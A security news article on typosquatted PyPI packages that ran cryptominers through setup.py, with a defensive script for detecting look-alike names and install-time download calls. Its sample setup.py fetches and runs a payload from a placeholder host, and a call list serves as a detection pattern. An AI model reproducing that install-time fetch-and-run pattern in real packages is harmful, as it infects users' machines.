Researchers uncovered six malicious packages in PyPI, the official package repository of the Python programming language. The packages typosquat the names of legitimate libraries and are laced with cryptomining malware.
The Python Package Index (PyPI) is the official repository of software packages for the Python language. Like npm, RubyGems and GitHub, it is part of the software supply chain: a place where authors upload packages that developers pull in while building applications and services, usually with a single `pip install` and no review of what the package does.
The fake packages were published by a single account using the ID "nedog123," and some of them date back to April 2021. Each carried code in its setup.py that downloads and installs cryptomining malware. Because pip executes setup.py as part of installation, the payload runs as soon as the package is installed, with the privileges of whoever ran pip, and the victim need not ever import the package.
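Two pre-install checks a practitioner can run against exactly this pattern, as an added example that is not code from the original post or from the packages it describes: a similarity check of requested package names against a list of popular packages (so that names like "maratlib" and "matplatlib-plus" stand out next to "matplotlib"), and a static scan of a setup.py for download-and-execute calls. `POPULAR`, `SAMPLE_SETUP_PY`, the similarity threshold and the suspicious-call lists are assumptions constructed for the example.

```python
"""Two pre-install checks against the pattern described above: a package
name that imitates a popular one, and a setup.py that fetches and runs a
payload while pip installs it. Added example; not code from the original
post or from the packages it names. POPULAR and SAMPLE_SETUP_PY are
constructed for the example."""
import ast
import difflib
import re

# Constructed list of names an attacker would plausibly squat (assumption).
POPULAR = ["matplotlib", "numpy", "requests", "pandas", "scipy"]

# Fully qualified calls that have no business running during installation.
SUSPICIOUS_CALLS = {
    "urllib.request.urlretrieve", "urllib.request.urlopen", "requests.get",
    "subprocess.Popen", "subprocess.run", "subprocess.call",
    "os.system", "os.popen", "exec", "eval",
}
# Bare names, to also catch `from subprocess import Popen` style imports.
SUSPICIOUS_BARE = {"urlretrieve", "urlopen", "Popen", "system", "exec", "eval"}


def _normalize(name):
    """PEP 503 name normalisation: case-fold, collapse runs of '-', '_', '.'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def _base(norm_name):
    """Drop a '-plus'/'-utils' style suffix and trailing digits, so that
    'matplatlib-plus' and 'maratlib1' are compared as 'matplatlib'/'maratlib'."""
    return re.sub(r"\d+$", "", norm_name.split("-")[0])


def typosquat_candidates(requested, popular=POPULAR, threshold=0.6):
    """Map each requested name that is not itself a popular package, but
    resembles one (difflib similarity >= threshold), to the names it imitates.
    Plain edit distance misses 'maratlib' (4 edits from 'matplotlib');
    the ratio of matched characters, 0.67 here, catches it."""
    norm_popular = {_normalize(p): p for p in popular}
    hits = {}
    for req in requested:
        n = _normalize(req)
        if n in norm_popular:
            continue  # exact normalised match: this is the real package
        b = _base(n)
        for np_, p in norm_popular.items():
            score = max(difflib.SequenceMatcher(None, n, np_).ratio(),
                        difflib.SequenceMatcher(None, b, np_).ratio())
            if score >= threshold:
                hits.setdefault(req, []).append(p)
    return hits


def _dotted(node):
    """Resolve a call target such as urllib.request.urlretrieve to its dotted
    name; None for anything that is not a plain Name/Attribute chain."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if not isinstance(node, ast.Name):
        return None
    parts.append(node.id)
    return ".".join(reversed(parts))


def suspicious_setup_calls(source):
    """Return sorted (lineno, dotted_name) for download/execute calls anywhere
    in a setup.py, including inside custom cmdclass hooks. Static only: it
    cannot see names built at runtime (getattr, exec of a decoded string), so
    an empty result means 'nothing obvious', not 'safe'."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _dotted(node.func)
            if name and (name in SUSPICIOUS_CALLS
                         or name.rsplit(".", 1)[-1] in SUSPICIOUS_BARE):
                hits.append((node.lineno, name))
    return sorted(hits)


# Constructed setup.py showing the install-time fetch-and-run pattern; the
# URL is a placeholder and nothing here is copied from the real packages.
SAMPLE_SETUP_PY = """\
from setuptools import setup
import os, subprocess, urllib.request

# payload fetched and started while `pip install` runs this file
urllib.request.urlretrieve("http://example.invalid/miner", "/tmp/miner")
os.system("chmod +x /tmp/miner")
subprocess.Popen(["/tmp/miner"])

setup(name="maratlib", version="0.1")
"""

if __name__ == "__main__":
    print(typosquat_candidates(["maratlib", "maratlib1", "matplatlib-plus",
                                "requests", "numpy"]))
    for lineno, name in suspicious_setup_calls(SAMPLE_SETUP_PY):
        print(f"setup.py:{lineno}: install-time call to {name}")
```

In practice the scanner is run on the sdist fetched with `pip download --no-deps --no-binary :all: <name>` before any `pip install`, and the name check on the project's requirements file. Both are heuristics: the similarity threshold trades false positives against misses, and the AST scan only sees literal call names, so a setup.py that decodes and `exec`s a string is flagged for the `exec` but its real behaviour still has to be read by hand.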
A single malicious package can be pulled into many projects and can infect every machine that installs it with cryptominers, info-stealers or other payloads, which makes remediation extremely difficult: removing the package from the index does not clean the hosts and build pipelines that have already run its setup.py.
Malicious Packages Details
- maratlib: 2,371 downloads
- maratlib1: 379 downloads
- matplatlib-plus: 913 downloads